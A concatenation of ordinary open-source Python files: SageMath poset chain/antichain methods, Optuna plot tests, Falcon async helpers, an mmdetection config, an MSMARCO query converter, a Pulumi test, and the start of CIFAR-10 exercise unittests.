sage: P = Poset((divisors(12), attrcall("divides")), facade=True, linear_extension=True)
sage: sorted(P.list())
[1, 2, 3, 4, 6, 12]
sage: P.is_order_filter([4, 12])
True
sage: P.is_order_filter([])
True
sage: P.is_order_filter({3, 4, 12})
False
sage: P.is_order_filter({3, 6, 12})
True
"""
return all((u in self and all(x in o for x in self.upper_covers(u))) for u in o)
def is_chain_of_poset(self, o, ordered=False):
"""
Return whether an iterable ``o`` is a chain of ``self``,
including a check for ``o`` being ordered from smallest
to largest element if the keyword ``ordered`` is set to
``True``.
INPUT:
- ``o`` -- an iterable (e. g., list, set, or tuple)
containing some elements of ``self``
- ``ordered`` -- a Boolean (default: ``False``) which
decides whether the notion of a chain includes being
ordered
OUTPUT:
If ``ordered`` is set to ``False``, the truth value of
the following assertion is returned: The subset of ``self``
formed by the elements of ``o`` is a chain in ``self``.
If ``ordered`` is set to ``True``, the truth value of
the following assertion is returned: Every element of the
list ``o`` is (strictly!) smaller than its successor in
``self``. (This makes no sense if ``ordered`` is a set.)
EXAMPLES::
sage: P = Poset((divisors(12), attrcall("divides")), facade=True, linear_extension=True)
sage: sorted(P.list())
[1, 2, 3, 4, 6, 12]
sage: P.is_chain_of_poset([1, 3])
True
sage: P.is_chain_of_poset([3, 1])
True
sage: P.is_chain_of_poset([1, 3], ordered=True)
True
sage: P.is_chain_of_poset([3, 1], ordered=True)
False
sage: P.is_chain_of_poset([])
True
sage: P.is_chain_of_poset([], ordered=True)
True
sage: P.is_chain_of_poset((2, 12, 6))
True
sage: P.is_chain_of_poset((2, 6, 12), ordered=True)
True
sage: P.is_chain_of_poset((2, 12, 6), ordered=True)
False
sage: P.is_chain_of_poset((2, 12, 6, 3))
False
sage: P.is_chain_of_poset((2, 3))
False
sage: Q = Poset({2: [3, 1], 3: [4], 1: [4]})
sage: Q.is_chain_of_poset([1, 2], ordered=True)
False
sage: Q.is_chain_of_poset([1, 2])
True
sage: Q.is_chain_of_poset([2, 1], ordered=True)
True
sage: Q.is_chain_of_poset([2, 1, 1], ordered=True)
False
sage: Q.is_chain_of_poset([3])
True
sage: Q.is_chain_of_poset([4, 2, 3])
True
sage: Q.is_chain_of_poset([4, 2, 3], ordered=True)
False
sage: Q.is_chain_of_poset([2, 3, 4], ordered=True)
True
Examples with infinite posets::
sage: from sage.categories.examples.posets import FiniteSetsOrderedByInclusion
sage: R = FiniteSetsOrderedByInclusion()
sage: R.is_chain_of_poset([R(set([3, 1, 2])), R(set([1, 4])), R(set([4, 5]))])
False
sage: R.is_chain_of_poset([R(set([3, 1, 2])), R(set([1, 2])), R(set([1]))], ordered=True)
False
sage: R.is_chain_of_poset([R(set([3, 1, 2])), R(set([1, 2])), R(set([1]))])
True
sage: from sage.categories.examples.posets import PositiveIntegersOrderedByDivisibilityFacade
sage: T = PositiveIntegersOrderedByDivisibilityFacade()
sage: T.is_chain_of_poset((T(3), T(4), T(7)))
False
sage: T.is_chain_of_poset((T(3), T(6), T(3)))
True
sage: T.is_chain_of_poset((T(3), T(6), T(3)), ordered=True)
False
sage: T.is_chain_of_poset((T(3), T(3), T(6)))
True
sage: T.is_chain_of_poset((T(3), T(3), T(6)), ordered=True)
False
sage: T.is_chain_of_poset((T(3), T(6)), ordered=True)
True
sage: T.is_chain_of_poset((), ordered=True)
True
sage: T.is_chain_of_poset((T(3),), ordered=True)
True
sage: T.is_chain_of_poset((T(q) for q in divisors(27)))
True
sage: T.is_chain_of_poset((T(q) for q in divisors(18)))
False
"""
list_o = list(o)
if ordered:
return all(self.lt(a, b) for a, b in zip(list_o, list_o[1:]))
else:
for (i, x) in enumerate(list_o):
for y in list_o[:i]:
if (not self.le(x, y)) and (not self.gt(x, y)):
return False
return True
def is_antichain_of_poset(self, o):
"""
Return whether an iterable ``o`` is an antichain of
``self``.
INPUT:
- ``o`` -- an iterable (e. g., list, set, or tuple)
containing some elements of ``self``
OUTPUT:
``True`` if the subset of ``self`` consisting of the entries
of ``o`` is an antichain of ``self``, and ``False`` otherwise.
EXAMPLES::
sage: P = Poset((divisors(12), attrcall("divides")), facade=True, linear_extension=True)
sage: sorted(P.list())
[1, 2, 3, 4, 6, 12]
sage: P.is_antichain_of_poset([1, 3])
False
sage: P.is_antichain_of_poset([3, 1])
False
sage: P.is_antichain_of_poset([1, 1, 3])
False
sage: P.is_antichain_of_poset([])
True
sage: P.is_antichain_of_poset([1])
True
sage: P.is_antichain_of_poset([1, 1])
True
sage: P.is_antichain_of_poset([3, 4])
True
sage: P.is_antichain_of_poset([3, 4, 12])
False
sage: P.is_antichain_of_poset([6, 4])
True
sage: P.is_antichain_of_poset(i for i in divisors(12) if (2 < i and i < 6))
True
sage: P.is_antichain_of_poset(i for i in divisors(12) if (2 <= i and i < 6))
False
sage: Q = Poset({2: [3, 1], 3: [4], 1: [4]})
sage: Q.is_antichain_of_poset((1, 2))
False
sage: Q.is_antichain_of_poset((2, 4))
False
sage: Q.is_antichain_of_poset((4, 2))
False
sage: Q.is_antichain_of_poset((2, 2))
True
sage: Q.is_antichain_of_poset((3, 4))
False
sage: Q.is_antichain_of_poset((3, 1))
True
sage: Q.is_antichain_of_poset((1, ))
True
sage: Q.is_antichain_of_poset(())
True
An infinite poset::
sage: from sage.categories.examples.posets import FiniteSetsOrderedByInclusion
sage: R = FiniteSetsOrderedByInclusion()
sage: R.is_antichain_of_poset([R(set([3, 1, 2])), R(set([1, 4])), R(set([4, 5]))])
True
sage: R.is_antichain_of_poset([R(set([3, 1, 2, 4])), R(set([1, 4])), R(set([4, 5]))])
False
"""
            elements = list(o)
            return all(not self.lt(x, y) for x in elements for y in elements)
CartesianProduct = LazyImport(
'sage.combinat.posets.cartesian_product', 'CartesianProductPoset')
class ElementMethods:
pass
# TODO: implement x<y, x<=y, x>y, x>=y appropriately once #10130 is resolved
#
# def __le__(self, other):
# r"""
# Return whether ``self`` is smaller or equal to ``other``
# in the poset.
#
# EXAMPLES::
#
# sage: P = Posets().example(); P
# An example of poset: sets ordered by inclusion
# sage: x = P(Set([1,3])); y = P(Set([1,2,3]))
# sage: x.__le__(y)
# sage: x <= y
# """
# return self.parent().le(self, other)
|
tests/visualization_tests/test_optimization_history.py | captain-pool/optuna | 1,300 | 12610124 | <reponame>captain-pool/optuna<filename>tests/visualization_tests/test_optimization_history.py
import numpy as np
import pytest
from optuna.study import create_study
from optuna.trial import Trial
from optuna.visualization import plot_optimization_history
def test_target_is_none_and_study_is_multi_obj() -> None:
study = create_study(directions=["minimize", "minimize"])
with pytest.raises(ValueError):
plot_optimization_history(study)
@pytest.mark.parametrize("direction", ["minimize", "maximize"])
def test_plot_optimization_history(direction: str) -> None:
# Test with no trial.
study = create_study(direction=direction)
figure = plot_optimization_history(study)
assert len(figure.data) == 0
def objective(trial: Trial) -> float:
if trial.number == 0:
return 1.0
elif trial.number == 1:
return 2.0
elif trial.number == 2:
return 0.0
return 0.0
# Test with a trial.
study = create_study(direction=direction)
study.optimize(objective, n_trials=3)
figure = plot_optimization_history(study)
assert len(figure.data) == 2
assert np.array_equal(figure.data[0].x, [0, 1, 2])
assert np.array_equal(figure.data[0].y, [1.0, 2.0, 0.0])
assert np.array_equal(figure.data[1].x, [0, 1, 2])
ydata = figure.data[1].y
if direction == "minimize":
assert np.array_equal(ydata, [1.0, 1.0, 0.0])
else:
assert np.array_equal(ydata, [1.0, 2.0, 2.0])
legend_texts = [x.name for x in figure.data]
assert legend_texts == ["Objective Value", "Best Value"]
assert figure.layout.yaxis.title.text == "Objective Value"
# Test customized target.
with pytest.warns(UserWarning):
figure = plot_optimization_history(study, target=lambda t: t.number)
assert len(figure.data) == 1
assert np.array_equal(figure.data[0].x, [0, 1, 2])
assert np.array_equal(figure.data[0].y, [0.0, 1.0, 2.0])
# Test customized target name.
custom_target_name = "Target Name"
figure = plot_optimization_history(study, target_name=custom_target_name)
legend_texts = [x.name for x in figure.data]
assert legend_texts == [custom_target_name, "Best Value"]
assert figure.layout.yaxis.title.text == custom_target_name
# Ignore failed trials.
def fail_objective(_: Trial) -> float:
raise ValueError
study = create_study(direction=direction)
study.optimize(fail_objective, n_trials=1, catch=(ValueError,))
figure = plot_optimization_history(study)
assert len(figure.data) == 0
@pytest.mark.parametrize("direction", ["minimize", "maximize"])
def test_plot_optimization_history_with_multiple_studies(direction: str) -> None:
n_studies = 10
# Test with no trial.
studies = [create_study(direction=direction) for _ in range(n_studies)]
figure = plot_optimization_history(studies)
assert len(figure.data) == 0
def objective(trial: Trial) -> float:
if trial.number == 0:
return 1.0
elif trial.number == 1:
return 2.0
elif trial.number == 2:
return 0.0
return 0.0
# Test with trials.
studies = [create_study(direction=direction) for _ in range(n_studies)]
for study in studies:
study.optimize(objective, n_trials=3)
figure = plot_optimization_history(studies)
assert len(figure.data) == 2 * n_studies
assert np.array_equal(figure.data[0].x, [0, 1, 2])
assert np.array_equal(figure.data[0].y, [1.0, 2.0, 0.0])
assert np.array_equal(figure.data[1].x, [0, 1, 2])
ydata = figure.data[1].y
if direction == "minimize":
assert np.array_equal(ydata, [1.0, 1.0, 0.0])
else:
assert np.array_equal(ydata, [1.0, 2.0, 2.0])
expected_legend_texts = []
for i in range(n_studies):
expected_legend_texts.append(f"Best Value of {studies[i].study_name}")
expected_legend_texts.append(f"Objective Value of {studies[i].study_name}")
legend_texts = [scatter.name for scatter in figure.data]
assert sorted(legend_texts) == sorted(expected_legend_texts)
assert figure.layout.yaxis.title.text == "Objective Value"
# Test customized target.
with pytest.warns(UserWarning):
figure = plot_optimization_history(studies, target=lambda t: t.number)
assert len(figure.data) == 1 * n_studies
assert np.array_equal(figure.data[0].x, [0, 1, 2])
assert np.array_equal(figure.data[0].y, [0, 1, 2])
# Test customized target name.
custom_target_name = "Target Name"
figure = plot_optimization_history(studies, target_name=custom_target_name)
expected_legend_texts = []
for i in range(n_studies):
expected_legend_texts.append(f"Best Value of {studies[i].study_name}")
expected_legend_texts.append(f"{custom_target_name} of {studies[i].study_name}")
legend_texts = [scatter.name for scatter in figure.data]
assert sorted(legend_texts) == sorted(expected_legend_texts)
assert figure.layout.yaxis.title.text == custom_target_name
# Ignore failed trials.
def fail_objective(_: Trial) -> float:
raise ValueError
studies = [create_study(direction=direction) for _ in range(n_studies)]
for study in studies:
study.optimize(fail_objective, n_trials=1, catch=(ValueError,))
figure = plot_optimization_history(studies)
assert len(figure.data) == 0
@pytest.mark.parametrize("direction", ["minimize", "maximize"])
def test_plot_optimization_history_with_error_bar(direction: str) -> None:
n_studies = 10
# Test with no trial.
studies = [create_study(direction=direction) for _ in range(n_studies)]
figure = plot_optimization_history(studies, error_bar=True)
assert len(figure.data) == 0
def objective(trial: Trial) -> float:
if trial.number == 0:
return 1.0
elif trial.number == 1:
return 2.0
elif trial.number == 2:
return 0.0
return 0.0
# Test with trials.
studies = [create_study(direction=direction) for _ in range(n_studies)]
for study in studies:
study.optimize(objective, n_trials=3)
figure = plot_optimization_history(studies, error_bar=True)
assert len(figure.data) == 4
assert np.array_equal(figure.data[0].x, [0, 1, 2])
assert np.array_equal(figure.data[0].y, [1.0, 2.0, 0.0])
assert np.array_equal(figure.data[1].x, [0, 1, 2])
ydata = figure.data[1].y
if direction == "minimize":
assert np.array_equal(ydata, [1.0, 1.0, 0.0])
else:
assert np.array_equal(ydata, [1.0, 2.0, 2.0])
# Scatters for error bar don't have `name`.
legend_texts = [scatter.name for scatter in figure.data if scatter.name is not None]
assert sorted(legend_texts) == ["Best Value", "Objective Value"]
assert figure.layout.yaxis.title.text == "Objective Value"
# Test customized target.
with pytest.warns(UserWarning):
figure = plot_optimization_history(studies, target=lambda t: t.number, error_bar=True)
assert len(figure.data) == 1
assert np.array_equal(figure.data[0].x, [0, 1, 2])
assert np.array_equal(figure.data[0].y, [0, 1, 2])
# Test customized target name.
custom_target_name = "Target Name"
figure = plot_optimization_history(studies, target_name=custom_target_name, error_bar=True)
legend_texts = [scatter.name for scatter in figure.data if scatter.name is not None]
assert sorted(legend_texts) == ["Best Value", custom_target_name]
assert figure.layout.yaxis.title.text == custom_target_name
# Ignore failed trials.
def fail_objective(_: Trial) -> float:
raise ValueError
studies = [create_study(direction=direction) for _ in range(n_studies)]
for study in studies:
study.optimize(fail_objective, n_trials=1, catch=(ValueError,))
figure = plot_optimization_history(studies, error_bar=True)
assert len(figure.data) == 0
@pytest.mark.parametrize("direction", ["minimize", "maximize"])
def test_error_bar_in_optimization_history(direction: str) -> None:
def objective(trial: Trial) -> float:
return trial.suggest_float("x", 0, 1)
studies = [create_study(direction=direction) for _ in range(3)]
suggested_params = [0.1, 0.3, 0.2]
for x, study in zip(suggested_params, studies):
study.enqueue_trial({"x": x})
study.optimize(objective, n_trials=1)
figure = plot_optimization_history(studies, error_bar=True)
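    # data[0] is the mean curve; data[2] and data[3] are the mean plus/minus one standard deviation bounds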
mean = np.mean(suggested_params)
std = np.std(suggested_params)
np.testing.assert_almost_equal(figure.data[0].y, mean)
np.testing.assert_almost_equal(figure.data[2].y, mean + std)
np.testing.assert_almost_equal(figure.data[3].y, mean - std)
|
falcon/util/sync.py | RioAtHome/falcon | 8,217 | 12610131 | import asyncio
from concurrent.futures import ThreadPoolExecutor
from functools import partial
from functools import wraps
import inspect
import os
from typing import Callable
__all__ = [
'async_to_sync',
'create_task',
'get_running_loop',
'runs_sync',
'sync_to_async',
'wrap_sync_to_async',
'wrap_sync_to_async_unsafe',
]
_one_thread_to_rule_them_all = ThreadPoolExecutor(max_workers=1)
try:
get_running_loop = asyncio.get_running_loop
except AttributeError: # pragma: nocover
# NOTE(kgriffs): This branch is definitely covered under py35 and py36
# but for some reason the codecov gate doesn't pick this up, hence
# the pragma above.
get_running_loop = asyncio.get_event_loop
try:
create_task = asyncio.create_task
except AttributeError: # pragma: nocover
# NOTE(kgriffs): This branch is definitely covered under py35 and py36
# but for some reason the codecov gate doesn't pick this up, hence
# the pragma above.
def create_task(coro, name=None):
return asyncio.ensure_future(coro)
def wrap_sync_to_async_unsafe(func) -> Callable:
"""Wrap a callable in a coroutine that executes the callable directly.
This helper makes it easier to use synchronous callables with ASGI
apps. However, it is considered "unsafe" because it calls the wrapped
function directly in the same thread as the asyncio loop. Generally, you
should use :func:`~.wrap_sync_to_async` instead.
Warning:
This helper is only to be used for functions that do not perform any
blocking I/O or lengthy CPU-bound operations, since the entire async
loop will be blocked while the wrapped function is executed.
For a safer, non-blocking alternative that runs the function in a
thread pool executor, use :func:`~.sync_to_async` instead.
Arguments:
func (callable): Function, method, or other callable to wrap
Returns:
function: An awaitable coroutine function that wraps the
synchronous callable.
"""
@wraps(func)
async def wrapper(*args, **kwargs):
return func(*args, **kwargs)
return wrapper
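# Example (illustrative sketch, awaited from inside a coroutine; ``read_cached_value``
# and ``cache`` are hypothetical names):
#
#     def read_cached_value(key):
#         return cache[key]  # in-memory lookup only, no blocking I/O
#
#     async_read = wrap_sync_to_async_unsafe(read_cached_value)
#     value = await async_read('some-key')  # runs directly on the event loop thread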
def wrap_sync_to_async(func, threadsafe=None) -> Callable:
"""Wrap a callable in a coroutine that executes the callable in the background.
This helper makes it easier to call functions that can not be
ported to use async natively (e.g., functions exported by a database
library that does not yet support asyncio).
To execute blocking operations safely, without stalling the async
loop, the wrapped callable is scheduled to run in the background, on a
separate thread, when the wrapper is called.
Normally, the default executor for the running loop is used to schedule the
synchronous callable. If the callable is not thread-safe, it can be
scheduled serially in a global single-threaded executor.
Warning:
Wrapping a synchronous function safely adds a fair amount of overhead
to the function call, and should only be used when a native async
library is not available for the operation you wish to perform.
Arguments:
func (callable): Function, method, or other callable to wrap
Keyword Arguments:
threadsafe (bool): Set to ``False`` when the callable is not
thread-safe (default ``True``). When this argument is ``False``,
the wrapped callable will be scheduled to run serially in a
global single-threaded executor.
Returns:
function: An awaitable coroutine function that wraps the
synchronous callable.
"""
if threadsafe is None or threadsafe:
executor = None # Use default
else:
executor = _one_thread_to_rule_them_all
@wraps(func)
async def wrapper(*args, **kwargs):
return await get_running_loop().run_in_executor(
executor, partial(func, *args, **kwargs)
)
return wrapper
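# Example (illustrative sketch, awaited from inside a coroutine; ``query_database``
# is a hypothetical blocking, non-thread-safe callable):
#
#     async_query = wrap_sync_to_async(query_database, threadsafe=False)
#     rows = await async_query('SELECT 1')  # runs serially in the single-threaded executor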
async def sync_to_async(func, *args, **kwargs):
"""Schedule a synchronous callable on the loop's default executor and await the result.
This helper makes it easier to call functions that can not be
ported to use async natively (e.g., functions exported by a database
library that does not yet support asyncio).
To execute blocking operations safely, without stalling the async
loop, the wrapped callable is scheduled to run in the background, on a
separate thread, when the wrapper is called.
The default executor for the running loop is used to schedule the
synchronous callable.
Warning:
This helper can only be used to execute thread-safe callables. If
the callable is not thread-safe, it can be executed serially
by first wrapping it with :func:`~.wrap_sync_to_async`, and then
executing the wrapper directly.
Warning:
Calling a synchronous function safely from an asyncio event loop
adds a fair amount of overhead to the function call, and should
only be used when a native async library is not available for the
operation you wish to perform.
Arguments:
func (callable): Function, method, or other callable to wrap
*args: All additional arguments are passed through to the callable.
Keyword Arguments:
**kwargs: All keyword arguments are passed through to the callable.
Returns:
function: An awaitable coroutine function that wraps the
synchronous callable.
"""
return await get_running_loop().run_in_executor(
None, partial(func, *args, **kwargs)
)
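# Example (illustrative sketch, awaited from inside a coroutine; ``time.sleep``
# stands in for any thread-safe blocking call):
#
#     import time
#     await sync_to_async(time.sleep, 0.1)  # sleeps on a worker thread; the loop stays free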
def _should_wrap_non_coroutines() -> bool:
"""Return ``True`` IFF ``FALCON_ASGI_WRAP_NON_COROUTINES`` is set in the environ.
This should only be used for Falcon's own test suite.
"""
return 'FALCON_ASGI_WRAP_NON_COROUTINES' in os.environ
def _wrap_non_coroutine_unsafe(func):
"""Wrap a coroutine using ``wrap_sync_to_async_unsafe()`` for internal test cases.
This method is intended for Falcon's own test suite and should not be
used by apps themselves. It provides a convenient way to reuse sync
methods for ASGI test cases when it is safe to do so.
Arguments:
func (callable): Function, method, or other callable to wrap
Returns:
When not in test mode, this function simply returns the callable
unchanged. Otherwise, if the callable is not a coroutine function,
it will be wrapped using ``wrap_sync_to_async_unsafe()``.
"""
if func is None:
return func
if not _should_wrap_non_coroutines():
return func
if inspect.iscoroutinefunction(func):
return func
return wrap_sync_to_async_unsafe(func)
def async_to_sync(coroutine, *args, **kwargs):
"""Invoke a coroutine function from a synchronous caller.
This method can be used to invoke an asynchronous task from a synchronous
context. The coroutine will be scheduled to run on the current event
loop for the current OS thread. If an event loop is not already running,
one will be created.
Warning:
This method is very inefficient and is intended primarily for testing
and prototyping.
Args:
coroutine: A coroutine function to invoke.
*args: Additional args are passed through to the coroutine function.
Keyword Args:
**kwargs: Additional args are passed through to the coroutine function.
"""
# TODO(vytas): The canonical way of doing this for simple use cases is
# asyncio.run(), but that would be a breaking change wrt the above
# documented behaviour; breaking enough to break some of our own tests.
# NOTE(vytas): Work around get_event_loop deprecation in 3.10 by going via
# get_event_loop_policy(). This should be equivalent for async_to_sync's
# use case as it is currently impossible to invoke run_until_complete()
# from a running loop anyway.
loop = asyncio.get_event_loop_policy().get_event_loop()
return loop.run_until_complete(coroutine(*args, **kwargs))
def runs_sync(coroutine):
"""Transform a coroutine function into a synchronous method.
This is achieved by always invoking the decorated coroutine function via
:meth:`async_to_sync`.
Warning:
This decorator is very inefficient and should only be used for adapting
asynchronous test functions for use with synchronous test runners such
as ``pytest`` or the ``unittest`` module.
It will create an event loop for the current thread if one is not
already running.
Args:
coroutine: A coroutine function to masquerade as a synchronous one.
Returns:
callable: A synchronous function.
"""
@wraps(coroutine)
def invoke(*args, **kwargs):
return async_to_sync(coroutine, *args, **kwargs)
return invoke
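# Example (illustrative sketch; ``compute`` is a hypothetical coroutine function):
#
#     @runs_sync
#     async def test_returns_answer():
#         assert await compute() == 42
#
#     test_returns_answer()  # now callable by a synchronous test runner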
|
configs/resnest/cascade_rcnn_s101_fpn_syncbn-backbone+head_mstrain-range_1x_coco.py | Brym-Gyimah/mmdetection | 20,190 | 12610148 | <reponame>Brym-Gyimah/mmdetection
_base_ = './cascade_rcnn_s50_fpn_syncbn-backbone+head_mstrain-range_1x_coco.py'
model = dict(
backbone=dict(
stem_channels=128,
depth=101,
init_cfg=dict(type='Pretrained',
checkpoint='open-mmlab://resnest101')))
|
scripts/data_convert/msmarco/convert_queries.py | gitter-badger/FlexNeuART | 101 | 12610154 | #!/usr/bin/env python
#
# Copyright 2014+ Carnegie Mellon University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Convert MSMARCO queries
"""
import json
import argparse
from flexneuart.io import FileWrapper
from flexneuart.io.qrels import write_qrels, add_qrel_entry
from flexneuart.io.stopwords import read_stop_words, STOPWORD_FILE
from flexneuart.text_proc.parse import SpacyTextParser, Sentencizer, get_retokenized, add_retokenized_field
from flexneuart.data_convert import add_bert_tok_args, create_bert_tokenizer_if_needed
from flexneuart.config import TEXT_BERT_TOKENIZED_NAME, \
TEXT_FIELD_NAME, DOCID_FIELD, \
TEXT_RAW_FIELD_NAME, TEXT_UNLEMM_FIELD_NAME, \
REPORT_QTY, SPACY_MODEL
parser = argparse.ArgumentParser(description='Convert MSMARCO-adhoc queries.')
parser.add_argument('--input', metavar='input file', help='input file',
type=str, required=True)
parser.add_argument('--output', metavar='output file', help='output file',
type=str, required=True)
parser.add_argument('--min_query_token_qty', type=int, default=0,
metavar='min # of query tokens', help='ignore queries that have smaller # of tokens')
add_bert_tok_args(parser)
args = parser.parse_args()
print(args)
arg_vars = vars(args)
inp_file = FileWrapper(args.input)
out_file = FileWrapper(args.output, 'w')
min_query_tok_qty = args.min_query_token_qty
stop_words = read_stop_words(STOPWORD_FILE, lower_case=True)
print(stop_words)
nlp = SpacyTextParser(SPACY_MODEL, stop_words, keep_only_alpha_num=True, lower_case=True)
bert_tokenizer = create_bert_tokenizer_if_needed(args)
# Input file is a TSV file
ln = 0
for line in inp_file:
ln += 1
line = line.strip()
if not line:
continue
fields = line.split('\t')
if len(fields) != 2:
        print('Misformatted line %d, ignoring:' % ln)
print(line.replace('\t', '<field delimiter>'))
continue
did, query_orig = fields
query_lemmas, query_unlemm = nlp.proc_text(query_orig)
query_toks = query_lemmas.split()
if len(query_toks) >= min_query_tok_qty:
doc = {DOCID_FIELD: did,
TEXT_FIELD_NAME: query_lemmas,
TEXT_UNLEMM_FIELD_NAME: query_unlemm,
TEXT_RAW_FIELD_NAME: query_orig}
add_retokenized_field(doc, TEXT_RAW_FIELD_NAME, TEXT_BERT_TOKENIZED_NAME, bert_tokenizer)
doc_str = json.dumps(doc) + '\n'
out_file.write(doc_str)
if ln % REPORT_QTY == 0:
print('Processed %d queries' % ln)
print('Processed %d queries' % ln)
inp_file.close()
out_file.close()
|
sdk/python/lib/test/langhost/chained_failure/test_chained_failure.py | pcen/pulumi | 12,004 | 12610164 | <filename>sdk/python/lib/test/langhost/chained_failure/test_chained_failure.py
# Copyright 2016-2021, Pulumi Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from os import path
from ..util import LanghostTest
class ChainedFailureTest(LanghostTest):
"""
Tests that the language host can tolerate "chained failures" - that is, a failure of an output to resolve when
attempting to prepare a resource for registration.
In this test, the program raises an exception in an apply, which causes the preparation of resourceB to fail. This
test asserts that this does not cause a deadlock (as it previously did, pulumi/pulumi#2189) but instead terminates
gracefully.
"""
def test_chained_failure(self):
self.run_test(
program=path.join(self.base_path(), "chained_failure"),
expected_error="Program exited with non-zero exit code: 1",
expected_resource_count=1)
def register_resource(self, _ctx, _dry_run, ty, name, _resource, _dependencies, _parent, _custom, protect,
_provider, _property_deps, _delete_before_replace, _ignore_changes, _version, _import,
_replace_on_changes):
if ty == "test:index:ResourceA":
self.assertEqual(name, "resourceA")
self.assertDictEqual(_resource, {"inprop": 777})
return {
"urn": self.make_urn(ty, name),
"id": name,
"object": {
"outprop": 200
}
}
if ty == "test:index:ResourceB":
self.fail(f"we should never have gotten here! {_resource}")
self.fail(f"unknown resource type: {ty}")
|
image-classification/problem_unittests.py | WillenZh/deep-learning-project | 474 | 12610168 | <filename>image-classification/problem_unittests.py
import os
import numpy as np
import tensorflow as tf
import random
from unittest.mock import MagicMock
def _print_success_message():
print('Tests Passed')
def test_folder_path(cifar10_dataset_folder_path):
assert cifar10_dataset_folder_path is not None,\
'Cifar-10 data folder not set.'
assert cifar10_dataset_folder_path[-1] != '/',\
'The "/" shouldn\'t be added to the end of the path.'
assert os.path.exists(cifar10_dataset_folder_path),\
'Path not found.'
assert os.path.isdir(cifar10_dataset_folder_path),\
'{} is not a folder.'.format(os.path.basename(cifar10_dataset_folder_path))
train_files = [cifar10_dataset_folder_path + '/data_batch_' + str(batch_id) for batch_id in range(1, 6)]
other_files = [cifar10_dataset_folder_path + '/batches.meta', cifar10_dataset_folder_path + '/test_batch']
missing_files = [path for path in train_files + other_files if not os.path.exists(path)]
assert not missing_files,\
'Missing files in directory: {}'.format(missing_files)
print('All files found!')
def test_normalize(normalize):
test_shape = (np.random.choice(range(1000)), 32, 32, 3)
test_numbers = np.random.choice(range(256), test_shape)
normalize_out = normalize(test_numbers)
assert type(normalize_out).__module__ == np.__name__,\
'Not Numpy Object'
assert normalize_out.shape == test_shape,\
'Incorrect Shape. {} shape found'.format(normalize_out.shape)
assert normalize_out.max() <= 1 and normalize_out.min() >= 0,\
        'Incorrect Range. {} to {} found'.format(normalize_out.min(), normalize_out.max())
_print_success_message()
def test_one_hot_encode(one_hot_encode):
test_shape = np.random.choice(range(1000))
test_numbers = np.random.choice(range(10), test_shape)
one_hot_out = one_hot_encode(test_numbers)
assert type(one_hot_out).__module__ == np.__name__,\
'Not Numpy Object'
assert one_hot_out.shape == (test_shape, 10),\
'Incorrect Shape. {} shape found'.format(one_hot_out.shape)
n_encode_tests = 5
test_pairs = list(zip(test_numbers, one_hot_out))
test_indices = np.random.choice(len(test_numbers), n_encode_tests)
labels = [test_pairs[test_i][0] for test_i in test_indices]
enc_labels = np.array([test_pairs[test_i][1] for test_i in test_indices])
new_enc_labels = one_hot_encode(labels)
assert np.array_equal(enc_labels, new_enc_labels),\
'Encodings returned different results for the same numbers.\n' \
'For the first call it returned:\n' \
'{}\n' \
'For the second call it returned\n' \
'{}\n' \
'Make sure you save the map of labels to encodings outside of the function.'.format(enc_labels, new_enc_labels)
_print_success_message()
def test_nn_image_inputs(neural_net_image_input):
image_shape = (32, 32, 3)
nn_inputs_out_x = neural_net_image_input(image_shape)
assert nn_inputs_out_x.get_shape().as_list() == [None, image_shape[0], image_shape[1], image_shape[2]],\
'Incorrect Image Shape. Found {} shape'.format(nn_inputs_out_x.get_shape().as_list())
assert nn_inputs_out_x.op.type == 'Placeholder',\
'Incorrect Image Type. Found {} type'.format(nn_inputs_out_x.op.type)
assert nn_inputs_out_x.name == 'x:0', \
'Incorrect Name. Found {}'.format(nn_inputs_out_x.name)
print('Image Input Tests Passed.')
def test_nn_label_inputs(neural_net_label_input):
n_classes = 10
nn_inputs_out_y = neural_net_label_input(n_classes)
assert nn_inputs_out_y.get_shape().as_list() == [None, n_classes],\
'Incorrect Label Shape. Found {} shape'.format(nn_inputs_out_y.get_shape().as_list())
assert nn_inputs_out_y.op.type == 'Placeholder',\
'Incorrect Label Type. Found {} type'.format(nn_inputs_out_y.op.type)
assert nn_inputs_out_y.name == 'y:0', \
'Incorrect Name. Found {}'.format(nn_inputs_out_y.name)
print('Label Input Tests Passed.')
def test_nn_keep_prob_inputs(neural_net_keep_prob_input):
nn_inputs_out_k = neural_net_keep_prob_input()
assert nn_inputs_out_k.get_shape().ndims is None,\
'Too many dimensions found for keep prob. Found {} dimensions. It should be a scalar (0-Dimension Tensor).'.format(nn_inputs_out_k.get_shape().ndims)
assert nn_inputs_out_k.op.type == 'Placeholder',\
'Incorrect keep prob Type. Found {} type'.format(nn_inputs_out_k.op.type)
assert nn_inputs_out_k.name == 'keep_prob:0', \
'Incorrect Name. Found {}'.format(nn_inputs_out_k.name)
print('Keep Prob Tests Passed.')
def test_con_pool(conv2d_maxpool):
test_x = tf.placeholder(tf.float32, [None, 32, 32, 5])
test_num_outputs = 10
test_con_k = (2, 2)
test_con_s = (4, 4)
test_pool_k = (2, 2)
test_pool_s = (2, 2)
conv2d_maxpool_out = conv2d_maxpool(test_x, test_num_outputs, test_con_k, test_con_s, test_pool_k, test_pool_s)
assert conv2d_maxpool_out.get_shape().as_list() == [None, 4, 4, 10],\
'Incorrect Shape. Found {} shape'.format(conv2d_maxpool_out.get_shape().as_list())
_print_success_message()
def test_flatten(flatten):
test_x = tf.placeholder(tf.float32, [None, 10, 30, 6])
flat_out = flatten(test_x)
assert flat_out.get_shape().as_list() == [None, 10*30*6],\
'Incorrect Shape. Found {} shape'.format(flat_out.get_shape().as_list())
_print_success_message()
def test_fully_conn(fully_conn):
test_x = tf.placeholder(tf.float32, [None, 128])
test_num_outputs = 40
fc_out = fully_conn(test_x, test_num_outputs)
assert fc_out.get_shape().as_list() == [None, 40],\
'Incorrect Shape. Found {} shape'.format(fc_out.get_shape().as_list())
_print_success_message()
def test_output(output):
